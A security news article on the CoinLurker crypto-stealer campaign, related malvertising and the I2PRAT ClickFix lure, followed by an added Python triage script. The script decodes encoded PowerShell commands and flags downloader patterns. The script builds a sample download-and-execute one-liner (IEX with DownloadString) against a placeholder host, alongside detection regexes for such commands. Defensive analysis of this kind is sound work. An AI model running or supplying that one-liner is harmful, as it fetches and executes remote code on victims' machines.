Hackers Use Webview2 to Install CoinLurker Malware and Avoid Security Monitoring
Threat actors are using phony software update lures to spread CoinLurker, a new stealer malware. In a technical report released on Monday, Morphisec researcher Nadav Lorber stated, "Written in Go, CoinLurker uses state-of-the-art obfuscation and anti-analysis techniques, making it a highly effective tool in modern cyber attacks."
The attacks use a variety of deceptive entry points: phishing emails that link to spoofed update pages, malvertising redirects, direct downloads from fake or compromised websites, links shared on social media and messaging apps, and software update notifications on compromised WordPress sites. Regardless of the entry point, the fake update prompts the user to install Microsoft Edge Webview2, which is then used to initiate the infection chain.
"Webview2's dependency on pre-installed components and user interaction complicates dynamic and sandbox analysis," Lorber stated. "Sandboxes often lack Webview2 or fail to replicate user actions, allowing the malware to evade automated detection." EtherHiding is one of the more sophisticated strategies used in these campaigns. It involves injecting scripts into compromised websites that connect to Web3 infrastructure and retrieve the final payload from a Bitbucket repository, where it is disguised as a legitimate tool (e.g., "UpdateMe.exe," "SecurityPatch.exe").
These executables are signed with a legitimate but stolen Extended Validation (EV) certificate, which adds another layer of deception and helps them bypass security controls. In the final phase, a "multi-layered injector" is used to deploy the payload.
CoinLurker also employs an elaborate design to hide its activities and hinder analysis. This includes heavily obfuscated code that checks whether the machine has already been compromised, decodes the payload in memory at runtime, and obscures the execution path through conditional checks, redundant resource assignments, and iterative memory manipulations. "This approach ensures that the malware evades detection, blends seamlessly into legitimate system activity, and bypasses network security rules that rely on process behavior for filtering," Morphisec said.
After CoinLurker is launched, it uses a socket-based method to establish contact with a remote server and then gathers information from particular folders connected to cryptocurrency wallets (namely, Bitcoin, Ethereum, Ledger Live, and Exodus), FileZilla, Telegram, and Discord. "This comprehensive scanning underscores CoinLurker's primary goal of harvesting valuable cryptocurrency-related data and user credentials," Lorber stated. "Its targeting of both mainstream and obscure wallets demonstrates its versatility and adaptability, making it a significant threat to users in the cryptocurrency ecosystem."
The development coincides with the discovery that, since at least November 13, 2024, a single threat actor has been employing lures associated with FreeCAD, Rhinoceros 3D, Planner 5D, and Onshape to orchestrate up to ten malvertising operations that exploit Google Search advertisements to target graphic design professionals. "Domains have been launched day after day, week after week, since at least November 13, 2024, for malvertising campaigns hosted on two dedicated IP addresses: 185.11.61[.]243 and 185.147.124[.]110," stated Silent Push. "Websites that originate from these two IP addresses are being launched in Google Search advertising campaigns, and all lead to a variety of malicious downloads."
The disclosure also follows the emergence of a new malware family known as I2PRAT, which uses a peer-to-peer network for encrypted communications with its command-and-control (C2) server. Cofense tracks the same malware under the name I2Parcae RAT. The attack begins with a phishing email containing a link that, when clicked, takes the recipient to a fake CAPTCHA verification page. This page uses the ClickFix technique to trick users into copying and running a Base64-encoded PowerShell command that launches a downloader, which pulls the RAT from the C2 server over a TCP socket and then deploys it.
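Defender-side triage of the ClickFix step described above, as an added example that is not from the article or from Morphisec's or Cofense's reporting: it decodes a PowerShell `-EncodedCommand` argument found in a process-creation command line and flags the hidden-window, download and in-memory-execution markers such one-liners carry. The sample log lines, the script and the URL are constructed placeholders.

```python
import base64
import re

# Common abbreviations PowerShell accepts for -EncodedCommand, followed by base64.
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Markers a ClickFix-style one-liner typically carries; matched against the decoded
# script and against the command line with the base64 blob removed.
SUSPICIOUS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "downloader": re.compile(
        r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|"
        r"downloadstring|downloadfile|net\.webclient", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "launch_binary": re.compile(r"start-process", re.I),
}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # flag present, but the payload is not a valid encoded script


def triage(cmdline):
    """Return (decoded_script, [indicator names]) for one process-creation command line."""
    decoded = decode_encoded_command(cmdline)
    visible = ENC_FLAG.sub(" ", cmdline)  # drop the blob so base64 noise cannot match
    text = visible + "\n" + (decoded or "")
    hits = [name for name, rx in SUSPICIOUS.items() if rx.search(text)]
    if decoded is not None:
        hits.insert(0, "encoded_command")
    return decoded, hits


def _encode(script):
    # Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE -> base64).
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample script and command lines; the URL is a placeholder, not a real indicator.
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://update.example.invalid/s')"
SAMPLE_LOGS = [
    "powershell.exe -w hidden -enc " + _encode(CONSTRUCTED_SCRIPT),  # ClickFix-style
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",  # benign admin use
]
```

Run `triage()` over each line in `SAMPLE_LOGS`: the first yields the decoded downloader plus four indicators, the second yields no decoded script and an empty indicator list.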